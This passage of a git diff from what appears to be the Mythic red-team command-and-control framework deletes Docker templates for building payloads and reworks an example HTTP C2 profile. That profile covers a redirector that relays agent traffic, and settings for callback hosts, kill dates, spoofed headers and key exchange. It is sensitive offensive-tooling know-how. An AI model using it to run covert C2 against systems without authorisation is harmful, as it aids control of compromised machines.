CC=aarch64-linux-gnu-gcc-5 go install std - -echo "Bootstrapping darwin/amd64..." -GOOS=darwin GOARCH=amd64 CGO_ENABLED=1 CC=o64-clang go install std - -# Install xgo within the container to enable internal cross compilation -echo "Installing xgo-in-xgo..." 
-go get -u github.com/karalabe/xgo -ln -s /go/bin/xgo /usr/bin/xgo \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/build.sh b/Docker_Templates/Docker_Payload_Type_base_files/build.sh deleted file mode 100644 index b75973fcf..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/build.sh +++ /dev/null @@ -1,126 +0,0 @@ -#!/bin/bash -# -# Contains the main cross compiler, that individually sets up each target build -# platform, compiles all the C dependencies, then build the requested executable -# itself. -# -# Usage: build.sh -# -# Needed environment variables: -# REPO_REMOTE - Optional VCS remote if not the primary repository is needed -# REPO_BRANCH - Optional VCS branch to use, if not the master branch -# DEPS - Optional list of C dependency packages to build -# ARGS - Optional arguments to pass to C dependency configure scripts -# PACK - Optional sub-package, if not the import path is being built -# OUT - Optional output prefix to override the package name -# FLAG_V - Optional verbosity flag to set on the Go builder -# FLAG_X - Optional flag to print the build progress commands -# FLAG_RACE - Optional race flag to set on the Go builder -# FLAG_TAGS - Optional tag flag to set on the Go builder -# FLAG_LDFLAGS - Optional ldflags flag to set on the Go builder -# FLAG_BUILDMODE - Optional buildmode flag to set on the Go builder -# TARGETS - Comma separated list of build targets to compile for -# GO_VERSION - Bootstrapped version of Go to disable uncupported targets -# EXT_GOPATH - GOPATH elements mounted from the host filesystem - -# Define a function that figures out the binary extension -function extension { - if [ "$FLAG_BUILDMODE" == "archive" ] || [ "$FLAG_BUILDMODE" == "c-archive" ]; then - if [ "$1" == "windows" ]; then - echo ".lib" - else - echo ".a" - fi - elif [ "$FLAG_BUILDMODE" == "shared" ] || [ "$FLAG_BUILDMODE" == "c-shared" ]; then - if [ "$1" == "windows" ]; then - echo ".dll" - elif [ "$1" == "darwin" ] || [ "$1" == "ios" ]; then - echo ".dylib" - else - echo ".so" - fi - else - if [ "$1" == "windows" ]; then - echo ".exe" - fi - fi -} - -# Configure some global build parameters -NAME=`basename $1/$PACK` -if [ "$OUT" != "" ]; then - NAME=$OUT -fi - -if [ "$FLAG_V" == "true" ]; then V=-v; fi -if [ "$FLAG_X" == "true" ]; then X=-x; fi -if [ "$FLAG_RACE" == "true" ]; then R=-race; fi -if [ "$FLAG_TAGS" != "" ]; then T=(--tags "$FLAG_TAGS"); fi -if [ "$FLAG_LDFLAGS" != "" ]; then LD="$FLAG_LDFLAGS"; fi - -if [ "$FLAG_BUILDMODE" != "" ] && [ "$FLAG_BUILDMODE" != "default" ]; then BM="--buildmode=$FLAG_BUILDMODE"; fi - -# If no build targets were specified, inject a catch all wildcard -if [ "$TARGETS" == "" ]; then - TARGETS="./." -fi - -# Build for each requested platform individually -for TARGET in $TARGETS; do - # Split the target into platform and architecture - XGOOS=`echo $TARGET | cut -d '/' -f 1` - XGOARCH=`echo $TARGET | cut -d '/' -f 2` - - # Check and build for Linux targets - if ([ $XGOOS == "." ] || [ $XGOOS == "linux" ]) && ([ $XGOARCH == "." ] || [ $XGOARCH == "amd64" ]); then - echo "Compiling for linux/amd64..." - #HOST=x86_64-linux PREFIX=/usr/local $BUILD_DEPS /deps ${DEPS_ARGS[@]} - #GOOS=linux GOARCH=amd64 CGO_ENABLED=1 go get $V $X "${T[@]}" --ldflags="$V $LD" -d ./$PACK - GOOS=linux GOARCH=amd64 CGO_ENABLED=1 go build $V $X "${T[@]}" --ldflags="$V $LD" $R $BM -o "/build/$NAME-linux-amd64$R`extension linux`" ./$PACK - - fi - - # Check and build for OSX targets - if [ $XGOOS == "." 
] || [[ $XGOOS == darwin* ]]; then - # Split the platform version and configure the deployment target - PLATFORM=`echo $XGOOS | cut -d '-' -f 2` - if [ "$PLATFORM" == "" ] || [ "$PLATFORM" == "." ] || [ "$PLATFORM" == "darwin" ]; then - PLATFORM=10.06 # OS X Snow Leopard - fi - export MACOSX_DEPLOYMENT_TARGET=$PLATFORM - - # Strip symbol table below Go 1.6 to prevent DWARF issues - LDSTRIP="" - if [ "$GO_VERSION" -lt 160 ]; then - LDSTRIP="-s" - fi - # Build the requested darwin binaries - if [ $XGOARCH == "." ] || [ $XGOARCH == "amd64" ]; then - echo "Compiling for darwin-$PLATFORM/amd64..." - #CC=o64-clang CXX=o64-clang++ HOST=x86_64-apple-darwin15 PREFIX=/usr/local $BUILD_DEPS /deps ${DEPS_ARGS[@]} - #CC=o64-clang CXX=o64-clang++ GOOS=darwin GOARCH=amd64 CGO_ENABLED=1 go get $V $X "${T[@]}" --ldflags="$LDSTRIP $V $LD" -d ./$PACK - CC=o64-clang CXX=o64-clang++ GOOS=darwin GOARCH=amd64 CGO_ENABLED=1 go build $V $X "${T[@]}" --ldflags="$LDSTRIP $V $LD" $R $BM -o "/build/$NAME-darwin-$PLATFORM-amd64$R`extension darwin`" ./$PACK - fi - # Remove any automatically injected deployment target vars - unset MACOSX_DEPLOYMENT_TARGET - fi -done - -# Clean up any leftovers for subsequent build invocations -#echo "Cleaning up build environment..." -#rm -rf /deps - -#for dir in `ls /usr/local`; do -# keep=0 - - # Check against original folder contents -# for old in $USR_LOCAL_CONTENTS; do -# if [ "$old" == "$dir" ]; then -# keep=1 -# fi -# done - # Delete anything freshly generated -# if [ "$keep" == "0" ]; then -# rm -rf "/usr/local/$dir" -# fi -#done \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/create_base_images.sh b/Docker_Templates/Docker_Payload_Type_base_files/create_base_images.sh deleted file mode 100755 index a8c9d8daa..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/create_base_images.sh +++ /dev/null @@ -1,16 +0,0 @@ -echo "Pruning old images..." -docker image prune -f -echo "Building golden csharp image..." -docker build -f "csharp_dockerfile" --rm -t "csharp_payload" . - -docker image prune -f -echo "Building golden python3.8 image..." -docker build -f "python38_dockerfile" --rm -t "python38_payload" . - -docker image prune -f -echo "Building golden xgo image..." -docker build -f "xgolang_dockerfile" --rm -t "xgolang_payload" . - -docker image prune -f -echo "Building golden leviathan image..." -docker build -f "leviathan_dockerfile" --rm -t "leviathan_payload" . 
\ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/csharp_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/csharp_dockerfile deleted file mode 100644 index b48b6b59c..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/csharp_dockerfile +++ /dev/null @@ -1,19 +0,0 @@ -from mono:latest -RUN apt-get update -RUN apt-get install software-properties-common apt-utils make build-essential libssl-dev zlib1g-dev libbz2-dev \ -libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev \ -xz-utils tk-dev libffi-dev liblzma-dev -y -RUN apt-get update -RUN wget https://www.python.org/ftp/python/3.8.6/Python-3.8.6.tgz -RUN tar xvf Python-3.8.6.tgz -RUN Python-3.8.6/configure --with-ensurepip=install -RUN make -j8 -RUN make altinstall -RUN python3.8 -m pip install aio_pika - -RUN mkdir -p "/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35" -COPY ["System.Management.Automation.dll", "/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll"] -RUN mkdir -p "/Windows/Microsoft.NET/assembly/GAC_MSIL/System.Management.Automation/v4.0_3.0.0.0__31bf3856ad364e35" -COPY ["System.Management.Automation.dll-v4", "/Windows/Microsoft.NET/assembly/GAC_MSIL/System.Management.Automation/v4.0_3.0.0.0__31bf3856ad364e35/System.Management.Automation.dll"] - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/fetch.sh b/Docker_Templates/Docker_Payload_Type_base_files/fetch.sh deleted file mode 100644 index 1a88c0216..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/fetch.sh +++ /dev/null @@ -1,27 +0,0 @@ -#!/bin/bash -# -# Contains a simple fetcher to download a file from a remote URL and verify its -# SHA1 or SHA256 checksum (selected based on provided length). -# -# Usage: fetch.sh -set -e - -# Skip the download if no operands specified -if [ "$1" == "" -o "$2" == "" ]; then - echo "Fetch operands missing, skipping..." - exit -fi - -# Pull the file from the remote URL -file=`basename $1` -echo "Downloading $1..." 
-wget -q $1 - -# Generate a desired checksum report and check against it -echo "$2 $file" > $file.sum -if [ "${#2}" == "40" ]; then - sha1sum -c $file.sum -else - sha256sum -c $file.sum -fi -rm $file.sum \ No newline at end of file diff --git a/Docker_Templates/Docker_Payload_Type_base_files/leviathan_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/leviathan_dockerfile deleted file mode 100644 index d74607620..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/leviathan_dockerfile +++ /dev/null @@ -1,10 +0,0 @@ -From python:3.8-buster -RUN pip install aio_pika - -RUN apt-get update -RUN apt-get install software-properties-common apt-utils -y -RUN apt-get -y install git -RUN git clone https://github.com/xorrior/CRX3-Creator.git /CRX3-Creator -RUN cd /CRX3-Creator; pip install -r requirements.txt; - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] diff --git a/Docker_Templates/Docker_Payload_Type_base_files/patch.tar.xz b/Docker_Templates/Docker_Payload_Type_base_files/patch.tar.xz deleted file mode 100644 index bff5da4ea..000000000 Binary files a/Docker_Templates/Docker_Payload_Type_base_files/patch.tar.xz and /dev/null differ diff --git a/Docker_Templates/Docker_Payload_Type_base_files/payload_service.sh b/Docker_Templates/Docker_Payload_Type_base_files/payload_service.sh deleted file mode 100755 index 00627848a..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/payload_service.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -cd /Mythic/mythic - -export PYTHONPATH=/Mythic:/Mythic/mythic - -python3.8 mythic_service.py diff --git a/Docker_Templates/Docker_Payload_Type_base_files/python38_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/python38_dockerfile deleted file mode 100644 index 37212bdb3..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/python38_dockerfile +++ /dev/null @@ -1,4 +0,0 @@ -From python:3.8-buster -RUN pip install aio_pika - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] diff --git a/Docker_Templates/Docker_Payload_Type_base_files/xgolang_dockerfile b/Docker_Templates/Docker_Payload_Type_base_files/xgolang_dockerfile deleted file mode 100644 index 7b157fcc9..000000000 --- a/Docker_Templates/Docker_Payload_Type_base_files/xgolang_dockerfile +++ /dev/null @@ -1,98 +0,0 @@ -# Go cross compiler (xgo): Base cross-compilation layer -# Copyright (c) 2014 Péter Szilágyi. All rights reserved. -# -# Released under the MIT license. 
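One note on the toolchain files in this area: the xgo image below injects fetch.sh (deleted just above) as $FETCH, and that script chooses between SHA1 and SHA256 purely by the length of the supplied checksum (40 hex characters means SHA1). A rough Python equivalent of that selection, for illustration only:

import hashlib


def verify_checksum(path, expected):
    # Mirror fetch.sh: a 40-character digest is treated as SHA1, anything else as SHA256.
    algo = hashlib.sha1 if len(expected) == 40 else hashlib.sha256
    with open(path, "rb") as fh:
        digest = algo(fh.read()).hexdigest()
    if digest != expected:
        raise ValueError("checksum mismatch for {}".format(path))

The 40-character dd228a… value passed to $FETCH in the Darwin SDK step below is an example of the SHA1 branch.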
-# pulled and modified from https://github.com/karalabe/xgo/blob/master/docker/go-1.13.4/Dockerfile - -FROM ubuntu:18.04 -# Mark the image as xgo enabled to support xgo-in-xgo -ENV XGO_IN_XGO 1 - -# Configure the Go environment, since it's not going to change -ENV PATH /usr/local/go/bin:$PATH -ENV GOPATH /go - - -# Inject the remote file fetcher and checksum verifier -ADD fetch.sh /fetch.sh -ENV FETCH /fetch.sh -RUN chmod +x $FETCH - - -# Make sure apt-get is up to date and dependent packages are installed -RUN \ - apt-get update && \ - apt-get install -y automake autogen build-essential ca-certificates cmake \ - gcc-5-aarch64-linux-gnu g++-5-aarch64-linux-gnu libc6-dev-arm64-cross \ - gcc-5-multilib g++-5-multilib clang llvm-dev \ - libtool libxml2-dev uuid-dev libssl-dev swig openjdk-8-jdk pkg-config patch \ - make xz-utils cpio wget zip unzip p7zip git mercurial bzr texinfo help2man \ - --no-install-recommends - -RUN \ - apt-get install -y python3 python3-pip - -RUN pip3 install aio_pika - -# Fix any stock package issues -RUN ln -s /usr/include/asm-generic /usr/include/asm - -########################## -# Darwin Toolchain build # -########################## - -# Configure the container for OSX cross compilation -ENV OSX_SDK MacOSX10.11.sdk -ENV OSX_SDK_PATH https://s3.dockerproject.org/darwin/v2/$OSX_SDK.tar.xz - -# Make libxar known to the ld64 and cctools build -ENV LD_LIBRARY_PATH=/osxcross/target/lib - -# Download the osx sdk and build the osx toolchain -# We download the osx sdk, patch it and pack it again to be able to throw the patched version at osxcross -RUN \ - $FETCH $OSX_SDK_PATH dd228a335194e3392f1904ce49aff1b1da26ca62 && \ - tar -xf `basename $OSX_SDK_PATH` && rm -f `basename $OSX_SDK_PATH` -ADD patch.tar.xz $OSX_SDK/usr/include/c++ -RUN tar -cf - $OSX_SDK/ | xz -c - > $OSX_SDK.tar.xz && rm -rf $OSX_SDK - -# Actually build the toolchain -RUN \ - git clone https://github.com/tpoechtrager/osxcross.git && \ - cd osxcross && git checkout 88cb6e8d0d7675cae7c8a2d66c11f58237101df0 && cd ../ && \ - mv $OSX_SDK.tar.xz /osxcross/tarballs/ && \ - OSX_VERSION_MIN=10.10 UNATTENDED=1 LD_LIBRARY_PATH=/osxcross/target/lib /osxcross/build.sh -ENV PATH /osxcross/target/bin:$PATH - -# Inject the new Go root distribution downloader and bootstrapper -ADD bootstrap_pure.sh /bootstrap_pure.sh -ENV BOOTSTRAP_PURE /bootstrap_pure.sh -RUN chmod +x $BOOTSTRAP_PURE - -# Inject the container entry point, the build script -ADD build.sh /build.sh -ENV BUILD /build.sh -RUN chmod +x $BUILD - -ENV GO_VERSION 11304 -# Make libxar known to the ld64 and cctools build -ENV LD_LIBRARY_PATH=/osxcross/target/lib - -RUN \ - export ROOT_DIST=https://storage.googleapis.com/golang/go1.13.4.linux-amd64.tar.gz && \ - export ROOT_DIST_SHA=692d17071736f74be04a72a06dab9cac1cd759377bd85316e52b2227604c004c && \ - \ - $BOOTSTRAP_PURE - -ENV GOROOT /usr/local/go -ENV GOPATH /go/src:/go/src/poseidon - -RUN go get github.com/google/shlex \ - github.com/kbinani/screenshot \ - github.com/tmc/scp \ - github.com/xorrior/keyctl \ - golang.org/x/crypto/ssh \ - golang.org/x/sync/semaphore \ - github.com/gorilla/websocket - -ENTRYPOINT ["/Mythic/mythic/payload_service.sh"] \ No newline at end of file diff --git a/Example_C2_Profile/Dockerfile b/Example_C2_Profile/Dockerfile index fd1da732e..38cbe3983 100755 --- a/Example_C2_Profile/Dockerfile +++ b/Example_C2_Profile/Dockerfile @@ -1 +1 @@ -From itsafeaturemythic/python38_sanic_c2profile:0.0.1 \ No newline at end of file +FROM itsafeaturemythic/python38_sanic_c2profile:0.0.4 diff --git 
a/C2_Profiles/HTTP/mythic/__init__.py b/Example_C2_Profile/__init__.py similarity index 100% rename from C2_Profiles/HTTP/mythic/__init__.py rename to Example_C2_Profile/__init__.py diff --git a/Example_C2_Profile/c2_code/config.json b/Example_C2_Profile/c2_code/config.json index af7e597b5..1060cfdfe 100755 --- a/Example_C2_Profile/c2_code/config.json +++ b/Example_C2_Profile/c2_code/config.json @@ -11,7 +11,7 @@ "port": 80, "key_path": "", "cert_path": "", - "debug": true + "debug": false } ] -} +} \ No newline at end of file diff --git a/Example_C2_Profile/c2_code/server b/Example_C2_Profile/c2_code/server index 037c209d8..913b89d4c 100755 --- a/Example_C2_Profile/c2_code/server +++ b/Example_C2_Profile/c2_code/server @@ -18,7 +18,11 @@ async def print_flush(message): sys.stdout.flush() -async def server_error_handler(request, exception): +def server_error_handler(request, exception): + if request is None: + print("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") + sys.stdout.flush() + return html("Error: Failed to process request", status=500, headers={}) return html("Error: Requested URL {} not found".format(request.url), status=404, headers=config[request.app.name]['headers']) @@ -33,22 +37,28 @@ async def agent_message(request, **kwargs): if request.method == "POST": # manipulate the request if needed #await MythicCallbackRPC().add_event_message(message="got a POST message") - response = requests.post(config['mythic_address'], data=request.body, verify=False, cookies=request.cookies, headers=request.headers) + response = requests.post(config['mythic_address'], data=request.body, verify=False, cookies=request.cookies, headers={"Mythic": "http", **request.headers}) else: # manipulate the request if needed #await MythicCallbackRPC().add_event_message(message="got a GET message") - response = requests.get(config['mythic_address'] + "?{}".format(request.query_string), verify=False, data=request.body, cookies=request.cookies, headers=request.headers) + #msg = await MythicCallbackRPC().encrypt_bytes(with_uuid=True, data="my message".encode(), uuid="eaf10700-cb30-402d-b101-8e35d67cdb41") + #await MythicCallbackRPC().add_event_message(message=msg.response) + response = requests.get(config['mythic_address'] + "?{}".format(request.query_string), verify=False, data=request.body, cookies=request.cookies, headers={"Mythic": "http", **request.headers}) return raw(response.content, headers=config[request.app.name]['headers'], status=response.status_code) except Exception as e: + if request is None: + await print_flush("Invalid HTTP Method - Likely HTTPS trying to talk to HTTP") + return server_error_handler(request, e) if config[request.app.name]['debug']: await print_flush("error in agent_message: {}".format(str(e))) - return await no_match(request, NotFound) + return server_error_handler(request, e) + if __name__ == "__main__": sys.path.append("/Mythic/mythic") - from C2ProfileBase import * - from MythicCallbackRPC import * + from mythic_c2_container.C2ProfileBase import * + from mythic_c2_container.MythicCallbackRPC import * config_file = open("config.json", 'rb') main_config = json.loads(config_file.read().decode('utf-8')) print("Opening config and starting instances...") diff --git a/Example_C2_Profile/mythic/C2ProfileBase.py b/Example_C2_Profile/mythic/C2ProfileBase.py deleted file mode 100644 index 313cdf49f..000000000 --- a/Example_C2_Profile/mythic/C2ProfileBase.py +++ /dev/null @@ -1,130 +0,0 @@ -from enum import Enum -from abc import abstractmethod -import json - - -class 
ParameterType(Enum): - String = "String" - ChooseOne = "ChooseOne" - Array = "Array" - Date = "Date" - Dictionary = "Dictionary" - - -class C2ProfileParameter: - def __init__( - self, - name: str, - description: str, - default_value: str = "", - randomize: bool = False, - format_string: str = "", - parameter_type: ParameterType = ParameterType.String, - required: bool = True, - verifier_regex: str = "", - choices: [str] = None, - ): - self.name = name - self.description = description - self.randomize = randomize - self.format_string = format_string - self.parameter_type = parameter_type - self.required = required - self.verifier_regex = verifier_regex - self.choices = choices - self.default_value = "" - if self.parameter_type == ParameterType.ChooseOne and choices is not None: - self.default_value = "\n".join(choices) - else: - self.default_value = default_value - - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "default_value": self.default_value if self.parameter_type not in [ParameterType.Array, ParameterType.Dictionary] else json.dumps(self.default_value), - "randomize": self.randomize, - "format_string": self.format_string, - "required": self.required, - "parameter_type": self.parameter_type.value, - "verifier_regex": self.verifier_regex, - } - - -class C2Profile: - @property - @abstractmethod - def name(self): - pass - - @property - @abstractmethod - def description(self): - pass - - @property - @abstractmethod - def author(self): - pass - - @property - @abstractmethod - def is_p2p(self): - pass - - @property - @abstractmethod - def is_server_routed(self): - pass - - @property - @abstractmethod - def mythic_encrypts(self): - pass - - @property - @abstractmethod - def parameters(self): - pass - - def to_json(self): - return { - "name": self.name, - "description": self.description, - "author": self.author, - "mythic_encrypts": self.mythic_encrypts, - "is_p2p": self.is_p2p, - "is_server_routed": self.is_server_routed, - "params": [x.to_json() for x in self.parameters], - } - - -class RPCStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, status: RPCStatus = None, response: str = None): - self.status = status - self.response = response - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - def to_json(self): - return {"status": self.status.value, "response": self.response} diff --git a/Example_C2_Profile/mythic/MythicBaseRPC.py b/Example_C2_Profile/mythic/MythicBaseRPC.py deleted file mode 100644 index e190491ac..000000000 --- a/Example_C2_Profile/mythic/MythicBaseRPC.py +++ /dev/null @@ -1,99 +0,0 @@ -from aio_pika import connect_robust, IncomingMessage, Message -import asyncio -import uuid -import json -from enum import Enum - - -class MythicStatus(Enum): - Success = "success" - Error = "error" - - -class RPCResponse: - def __init__(self, resp: dict): - self._raw_resp = resp - if resp["status"] == "success": - self.status = MythicStatus.Success - self.response = resp["response"] if "response" in resp else "" - self.error_message = None - else: - self.status = MythicStatus.Error - self.error_message = resp["error"] - self.response = None - - @property - def status(self): - return self._status - - @status.setter - def status(self, status): - self._status = status - - @property - def 
error_message(self): - return self._error_message - - @error_message.setter - def error_message(self, error_message): - self._error_message = error_message - - @property - def response(self): - return self._response - - @response.setter - def response(self, response): - self._response = response - - -class MythicBaseRPC: - def __init__(self): - self.connection = None - self.channel = None - self.callback_queue = None - self.futures = {} - self.loop = asyncio.get_event_loop() - - async def connect(self): - config_file = open("/Mythic/mythic/rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - self.connection = await connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - self.channel = await self.connection.channel() - self.callback_queue = await self.channel.declare_queue(exclusive=True) - await self.callback_queue.consume(self.on_response) - - return self - - def on_response(self, message: IncomingMessage): - future = self.futures.pop(message.correlation_id) - future.set_result(message.body) - - async def call(self, n, receiver: str = None) -> RPCResponse: - if self.connection is None: - await self.connect() - correlation_id = str(uuid.uuid4()) - future = self.loop.create_future() - - self.futures[correlation_id] = future - if receiver is None: - router = "c2rpc_queue" - else: - router = "{}_rpc_queue".format(receiver) - await self.channel.default_exchange.publish( - Message( - json.dumps(n).encode(), - content_type="application/json", - correlation_id=correlation_id, - reply_to=self.callback_queue.name, - ), - routing_key=router, - ) - - return RPCResponse(json.loads(await future)) diff --git a/Example_C2_Profile/mythic/MythicCallbackRPC.py b/Example_C2_Profile/mythic/MythicCallbackRPC.py deleted file mode 100644 index 002a8038c..000000000 --- a/Example_C2_Profile/mythic/MythicCallbackRPC.py +++ /dev/null @@ -1,124 +0,0 @@ -from MythicBaseRPC import * -import base64 - - -class MythicRPCResponse(RPCResponse): - def __init__(self, resp: RPCResponse): - super().__init__(resp._raw_resp) - if resp.status == MythicStatus.Success: - self.data = resp.response - else: - self.data = None - - @property - def data(self): - return self._data - - @data.setter - def data(self, data): - self._data = data - - -class MythicCallbackRPC(MythicBaseRPC): - # returns dictionary of `{"raw": raw_tasking, "encrypted": base64(uuid+encrypted_tasking)}` - async def get_tasking( - self, uuid: str, tasking_size: int = 1 - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_tasking", - "uuid": uuid, - "tasking_size": tasking_size, - } - ) - return MythicRPCResponse(resp) - - async def add_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "add_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def remove_route( - self, - source_uuid: str, - destination_uuid: str, - direction: int = 1, - metadata: str = None, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "remove_route", - "source": source_uuid, - "destination": destination_uuid, - "direction": direction, - "metadata": metadata, - } - ) - return MythicRPCResponse(resp) - - async def get_callback_info(self, uuid: str) -> 
MythicRPCResponse: - resp = await self.call({"action": "get_callback_info", "uuid": uuid}) - return MythicRPCResponse(resp) - - async def get_encryption_data(self, uuid: str, profile: str) -> MythicRPCResponse: - resp = await self.call( - { - "action": "get_encryption_data", - "uuid": uuid, - "c2_profile": profile, - } - ) - return MythicRPCResponse(resp) - - async def update_callback_info(self, uuid: str, info: dict) -> MythicRPCResponse: - resp = await self.call( - {"action": "update_callback_info", "uuid": uuid, "data": info} - ) - return MythicRPCResponse(resp) - - async def add_event_message( - self, message: str, level: str = "info" - ) -> MythicRPCResponse: - resp = await self.call( - {"action": "add_event_message", "level": level, "message": message} - ) - return MythicRPCResponse(resp) - - async def encrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "encrypt_bytes", - "data": base64.b64encode(data).decode(), - "uuid": uuid, - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) - - async def decrypt_bytes( - self, data: bytes, uuid: str, with_uuid: bool = False, - ) -> MythicRPCResponse: - resp = await self.call( - { - "action": "decrypt_bytes", - "uuid": uuid, - "data": base64.b64encode(data).decode(), - "with_uuid": with_uuid, - } - ) - return MythicRPCResponse(resp) diff --git a/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py b/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py index 6332e7fc2..1a4aa6b24 100644 --- a/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py +++ b/Example_C2_Profile/mythic/c2_functions/C2_RPC_functions.py @@ -1,5 +1,5 @@ -from C2ProfileBase import * -import MythicCallbackRPC +from mythic_c2_container.C2ProfileBase import * +import sys # request is a dictionary: {"action": func_name, "message": "the input", "task_id": task id num} # must return an RPCResponse() object and set .status to an instance of RPCStatus and response to str of message @@ -8,4 +8,20 @@ async def test(request): response.status = RPCStatus.Success response.response = "hello" #resp = await MythicCallbackRPC.MythicCallbackRPC().add_event_message(message="got a POST message") - return response \ No newline at end of file + return response + + +# The opsec function is called when a payload is created as a check to see if the parameters supplied are good +# The input for "request" is a dictionary of: +# { +# "action": "opsec", +# "parameters": { +# "param_name": "param_value", +# "param_name2: "param_value2", +# } +# } +# This function should return one of two things: +# For success: {"status": "success", "message": "your success message here" } +# For error: {"status": "error", "error": "your error message here" } +async def opsec(request): + return {"status": "success", "message": "No OPSEC Check Performed"} \ No newline at end of file diff --git a/Example_C2_Profile/mythic/c2_functions/HTTP.py b/Example_C2_Profile/mythic/c2_functions/HTTP.py index eec1d8f51..38816cf96 100644 --- a/Example_C2_Profile/mythic/c2_functions/HTTP.py +++ b/Example_C2_Profile/mythic/c2_functions/HTTP.py @@ -1,13 +1,12 @@ -from C2ProfileBase import * +from mythic_c2_container.C2ProfileBase import * class HTTP(C2Profile): - name = "HTTP" + name = "http" description = "Uses HTTP(S) connections with a simple query parameter or basic POST messages. For more configuration options use dynamicHTTP." 
author = "@its_a_feature_" is_p2p = False is_server_routed = False - mythic_encrypts = True parameters = [ C2ProfileParameter( name="callback_port", @@ -19,13 +18,15 @@ class HTTP(C2Profile): C2ProfileParameter( name="killdate", description="Kill Date", - default_value="yyyy-mm-dd", + parameter_type=ParameterType.Date, + default_value=365, required=False, ), C2ProfileParameter( name="encrypted_exchange_check", description="Perform Key Exchange", choices=["T", "F"], + required=False, parameter_type=ParameterType.ChooseOne, ), C2ProfileParameter( @@ -36,22 +37,39 @@ class HTTP(C2Profile): required=False, ), C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", - default_value="", - required=False, - ), - C2ProfileParameter( - name="USER_AGENT", - description="User Agent", - default_value="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", + name="headers", + description="HTTP Headers", required=False, + parameter_type=ParameterType.Dictionary, + default_value=[ + { + "name": "User-Agent", + "max": 1, + "default_value": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko", + "default_show": True, + }, + { + "name": "Host", + "max": 1, + "default_value": "", + "default_show": False, + }, + { + "name": "*", + "max": -1, + "default_value": "", + "default_show": False + } + ] ), C2ProfileParameter( name="AESPSK", - description="Base64 of a 32B AES Key", - default_value="", + description="Crypto type", + default_value="aes256_hmac", + parameter_type=ParameterType.ChooseOne, + choices=["aes256_hmac", "none"], required=False, + crypto_type=True ), C2ProfileParameter( name="callback_host", @@ -60,84 +78,47 @@ class HTTP(C2Profile): verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", ), C2ProfileParameter( - name="callback_interval", - description="Callback Interval in seconds", - default_value="10", - verifier_regex="^[0-9]+$", - required=False, - ), - ] -""" -C2ProfileParameter( - name="callback_port", - description="Callback Port", - default_value="80", - verifier_regex="^[0-9]+$", + name="get_uri", + description="GET request URI (don't include leading /)", + default_value="index", required=False, ), C2ProfileParameter( - name="encrypted_exchange_check", - description="Perform Key Exchange", - choices=["T", "F"], - parameter_type=ParameterType.ChooseOne, + name="post_uri", + description="POST request URI (don't include leading /)", + default_value="data", + required=False, ), C2ProfileParameter( - name="callback_jitter", - description="Callback Jitter in percent", - default_value="23", - verifier_regex="^[0-9]+$", + name="query_path_name", + description="Name of the query parameter for GET requests", + default_value="q", required=False, + verifier_regex="^[^\/]", ), C2ProfileParameter( - name="domain_front", - description="Host header value for domain fronting", + name="proxy_host", + description="Proxy Host", default_value="", required=False, + verifier_regex="^$|^(http|https):\/\/[a-zA-Z0-9]+", ), C2ProfileParameter( - name="callback_host", - description="Callback Host", - default_value="https://domain.com", - parameter_type=ParameterType.Array, - verifier_regex="^(http|https):\/\/[a-zA-Z0-9]+", - ), - - C2ProfileParameter( - name="killdate", - description="Kill Date", - parameter_type=ParameterType.Date, - default_value=365, + name="proxy_port", + description="Proxy Port", + default_value="", + verifier_regex="^$|^[0-9]+$", required=False, ), C2ProfileParameter( - name="USER_AGENT", - description="User Agent", + name="proxy_user", 
